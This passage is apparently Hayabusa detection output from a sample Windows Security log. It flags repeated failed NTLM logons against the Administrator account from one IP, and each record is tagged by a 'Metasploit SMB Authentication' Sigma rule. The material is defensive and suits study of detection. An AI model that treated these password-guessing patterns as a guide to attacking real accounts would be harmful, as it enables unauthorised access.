NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kHVXEHq9zNYdfTpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OIw3BxmLsfwDXXFg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hhgRhjnhkRJus4fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xz78guWXrekEvuFT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 04wNT26RJmriQrfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XmbuuymdSpfNldt2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: yqJarBVOImq5Tn2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BZYExQroYH65tPuG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llU5DQBrIrV3VtG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HV17iXOYQqs2ntax : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esZnEeyGdPa22PsL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rlYFTP9a2wdi5A2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJifU0PnO1Ntp6z3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGKdKjJy28Qd1whT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3L4BYjYJYlvuYHE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ui5RoLKttDo0wfFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: G2xjdWobsxBjo6p7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TPeQ0M5lXITI84G3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uu72qx4lG5ZRM7xf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zD072YR1hIgbzjaT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqA7HDvImIlCiFq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: efYFxZwMGEC3vVi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6WmMHYegvFJvv6zd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DS9WkRnP0B5MgaeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5jNPV7ZgFExgg9n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1FJ6vm3wK97iual : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: GLuIx0sfF8NQD8QY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y3lMvcrrmGTkjdlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZqOabcNMeazs6TC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2AbE9D8PvuFDBz5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzWdLEEc68ZvviGh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtV3BuZiljbAeikO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnKKfcwikNDdYOam : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jSbbzD7fpJY4Q1JL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gOASpLLE25ruCnGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jhUGOtszbPUwccL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: yB8Mzo1RppdpLFKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOwoUlHGVeSbAhuN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BXIEHbkrjwedeaih : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OvsKoixgEzUgAyie : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TzaZe6Y4Tdfjseuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEmbuU3CAC3CecZy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kfBmqmVPd0CGVUsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Uz3TlU6yrcveM1w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z6hH6AkkgBFmeZ6u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2J1W2WhA6Pj7j5j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
